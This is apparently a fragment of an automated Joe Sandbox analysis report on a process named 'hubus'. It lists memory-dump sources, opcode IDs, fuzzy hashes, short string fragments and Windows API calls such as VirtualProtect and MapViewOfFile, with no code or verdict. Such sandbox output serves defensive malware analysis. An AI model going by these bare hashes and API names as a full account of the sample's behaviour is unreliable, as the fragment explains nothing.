                                                                                                                                                                                                                                                              • Opcode ID: 0d2b0c0526fdcef3b481d09a6bc072a5d495b5b4473c1566823cd037b2dc7773
                                                                                                                                                                                                                                                              • Instruction ID: a108e72aa0aa732ca12bbcb8c3b0af16cf05c563d7d7a8af38d85b1aca8085e6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d2b0c0526fdcef3b481d09a6bc072a5d495b5b4473c1566823cd037b2dc7773
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0F015B0D0A258CFDB21EF04D844FADBAB5BB05348F001099954837240C7389E88CF16
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ,Ar
                                                                                                                                                                                                                                                              • API String ID: 0-3033950523
                                                                                                                                                                                                                                                              • Opcode ID: 0726776a10d7d56fc1afaf799afafb1b90c98846c18ef197adb0342cf1f54cee
                                                                                                                                                                                                                                                              • Instruction ID: 5a9ddf7f6a071ffd5cce5e133a3dc84c628ee5302c7c43a9c8b13e6fe555a0ba
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0726776a10d7d56fc1afaf799afafb1b90c98846c18ef197adb0342cf1f54cee
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A520975A002289FDB68CF69C981BADBBF6BF88300F1581D9E549A7351DB309D84CF61
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 05AE4924
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                                                              • Opcode ID: 830d5f56ddf1f56041d44ac8bb6897585a11955865440f6d953b04f091a43095
                                                                                                                                                                                                                                                              • Instruction ID: e5c1a51e41a59216e38334e7d643d8395a12ad5dd6f471fe8f279842531fdb0d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 830d5f56ddf1f56041d44ac8bb6897585a11955865440f6d953b04f091a43095
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C051CFB4D002589FDF20CFA9D984BEEBBB5BF49304F20952AE815B7240DB749845CF54
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 05AE4924
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                                                              • Opcode ID: af93750b517bea14def93f34c5d82459234f319bf67f243a91651421b13fd120
                                                                                                                                                                                                                                                              • Instruction ID: e308161eb97a8f80a122dd6029b691fd2cd73c64e2a3c4ca667cbf869e26f245
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af93750b517bea14def93f34c5d82459234f319bf67f243a91651421b13fd120
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF51DFB4D002589FDF20CFA9D984BEEBBB5BF49304F20952AE815B7240DB749845CF54
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 05AE4DA6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFileMapping
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 524692379-0
                                                                                                                                                                                                                                                              • Opcode ID: 63e03bf75a94ade355a888f2a665fb1d1851b6f17b0ce0b3e06998d0b9669d75
                                                                                                                                                                                                                                                              • Instruction ID: 379b2b9760acedd949b600df368fb8d2ee2efd7d378b23df64bc45edf5b8b18a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63e03bf75a94ade355a888f2a665fb1d1851b6f17b0ce0b3e06998d0b9669d75
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1751E0B4D043189FDF10CFA9D985BEEBBB6BF09300F14942AE815AB240D7749885CF55
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 05AE4DA6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFileMapping
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 524692379-0
                                                                                                                                                                                                                                                              • Opcode ID: c2ed1281dc96a3883533c497e74147c8835cae7364c9405fc9e45e855001d28c
                                                                                                                                                                                                                                                              • Instruction ID: 946425086560d7be336f39d27e0a9e9a97afad3c3dcdf6f171d0539afcd9283d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2ed1281dc96a3883533c497e74147c8835cae7364c9405fc9e45e855001d28c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1651BFB4D043189FDF20CFA9D984BEEBBB6BF49310F149429E815AB240DB749885CF55
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 05AE5102
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileView
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3314676101-0
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 05AE5102
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileView
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3314676101-0
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05AE5524
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05AE5524
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: (Ar
                                                                                                                                                                                                                                                              • API String ID: 0-793193261
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-3085744161
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088273661.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ab0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: DDr
                                                                                                                                                                                                                                                              • API String ID: 0-755372105
                                                                                                                                                                                                                                                              • Opcode ID: 5f90c1ceed2b3823181a5c8dc83ccaf91f6577869c32efd9bf17249ca06a3547
                                                                                                                                                                                                                                                              • Instruction ID: 80afced8f576c9d511414c3148ed4bf2064a85e9a70dd9619162886c927a7ff2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f90c1ceed2b3823181a5c8dc83ccaf91f6577869c32efd9bf17249ca06a3547
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB818E306002119FD719EF6DD954A6ABBF2EF89310F1581ADD41AAB3A1CB39AC01CB91
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4|Br
                                                                                                                                                                                                                                                              • API String ID: 0-2141330505
                                                                                                                                                                                                                                                              • Opcode ID: 6c3c16a9c325aa9a80e975a2435b1e1c0aa66b4240620e62d76be54d8907ab09
                                                                                                                                                                                                                                                              • Instruction ID: 97a7a0539b2e363949291bfbcb881584066ed1fdc7fecafdb776d01b970a7b3c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c3c16a9c325aa9a80e975a2435b1e1c0aa66b4240620e62d76be54d8907ab09
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0781C875A05218CFEB64CF29E895B9AB7F2FB89301F1480E9D509A7380DB345E85CF61
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: TJBr
                                                                                                                                                                                                                                                              • API String ID: 0-1684173416
                                                                                                                                                                                                                                                              • Opcode ID: d09c0cc68f94e02cf62339597b9c6230ca7cd8d8827eeb59257f14953515b5f0
                                                                                                                                                                                                                                                              • Instruction ID: 0da3bb3878a0287e873e5bc558048989383a30e05390a6716ac3ea5117ea5a2e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d09c0cc68f94e02cf62339597b9c6230ca7cd8d8827eeb59257f14953515b5f0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1171DBB8E052089FDB05DFA8E484AAEBBF2FF89301F109069E415AB354DB345D46CF51
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: TJBr
                                                                                                                                                                                                                                                              • API String ID: 0-1684173416
                                                                                                                                                                                                                                                              • Opcode ID: c2326a49183136107d23db4b9dfa468bdeb9c00f370d9a4cb2bc8a189bd3b365
                                                                                                                                                                                                                                                              • Instruction ID: a1cfdd4b5de0aea8b3a98a4da21efc0a154de0bf3b36cf51fbf5dc6522f3ebb8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2326a49183136107d23db4b9dfa468bdeb9c00f370d9a4cb2bc8a189bd3b365
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B071B9B8E052089FCB45DFA9E484AAEBBF2FF89301F109069E415AB354DB345D46CF51
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: PH=r
                                                                                                                                                                                                                                                              • API String ID: 0-1076057192
                                                                                                                                                                                                                                                              • Opcode ID: 9c20e3b907695756347b058fd322106ea731e019475609211582a66f02ba6877
                                                                                                                                                                                                                                                              • Instruction ID: 75a566eb0aec3f52a2620874c7542dcc19404451c57459a1456b123448bc945b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c20e3b907695756347b058fd322106ea731e019475609211582a66f02ba6877
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6711774A05218CFDB14DFA8E888BAEBBF2FB48305F508499D48AAB754CB745D85CF11
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-3085744161
                                                                                                                                                                                                                                                              • Opcode ID: 6718547136b8c92d2051264de9d6a49678dd7bb2def71932f0fc3d3d108f5b63
                                                                                                                                                                                                                                                              • Instruction ID: f181d66a211e7a01d83479704b6c022dbdee522a6c30be1b2d67fd581c364b11
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6718547136b8c92d2051264de9d6a49678dd7bb2def71932f0fc3d3d108f5b63
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9411C31B106159FCB14AB68C8A8E6EB7B7BFC8600F10442EE5069B395DF749C46CB91
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-3085744161
                                                                                                                                                                                                                                                              • Opcode ID: 84b9b25ec24d853ac506274a96dfaf7200f9b001839be69221434ff8eb1d720d
                                                                                                                                                                                                                                                              • Instruction ID: f778a6cedffc3b3c8a808b094fdb30c2c497bb46be6de53e3e6affc2ccf65be8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84b9b25ec24d853ac506274a96dfaf7200f9b001839be69221434ff8eb1d720d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE416C363406019FD709DBA8D959F2A77F6AF88710F108069E2098F3A2CF35EC42CB90
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-3085744161
                                                                                                                                                                                                                                                              • Opcode ID: 5062906082971a4f366296ae5cea8226a6bbb2448f02c249348ec9cdf3f79af6
                                                                                                                                                                                                                                                              • Instruction ID: 0605628ce65a59a29d8eaac3ef593bc86fbf2e0ccb9477fc7f5b7434ea696bcc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5062906082971a4f366296ae5cea8226a6bbb2448f02c249348ec9cdf3f79af6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0314C753006119FD709DBA8C554F2B77FAAFC8700F108069E60A8B3A1CF75EC428791
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: p
                                                                                                                                                                                                                                                              • API String ID: 0-2181537457
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: HAr
                                                                                                                                                                                                                                                              • API String ID: 0-666051703
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-3085744161
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-3085744161
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r
                                                                                                                                                                                                                                                              • API String ID: 0-3085744161
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: (Ar
                                                                                                                                                                                                                                                              • API String ID: 0-793193261
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ~
                                                                                                                                                                                                                                                              • API String ID: 0-1707062198
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 469df1a7d8d01532c0c2cf77080692cb6c632a1b4c9d94fae15177f23b62866d
                                                                                                                                                                                                                                                              • Instruction ID: 7c7eda5f923573c17f32c10e3afd6faada2ce640767ae380b60caab22be9d867
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 469df1a7d8d01532c0c2cf77080692cb6c632a1b4c9d94fae15177f23b62866d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A951C470E01208DFDB18DFB9D994AADBBF2BF89300F20852AE415AB365DB355941CF50
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088218095.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5aa0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: d318e0e90385f88d96ae3aa5abd4fa4a216f44220799e7b81cc224a391a957e2
                                                                                                                                                                                                                                                              • Instruction ID: 876ba11bbd8ae0dc5c3932e4ae6561a3c7c6396d10967189110c3c0aac914769
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d318e0e90385f88d96ae3aa5abd4fa4a216f44220799e7b81cc224a391a957e2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C413675A05148CFEB20CFA8E495BADBBF2FF49321F249029E806A7245DB745D86CB14
                                                                                                                                                                                                                                                              Memory Dump Source
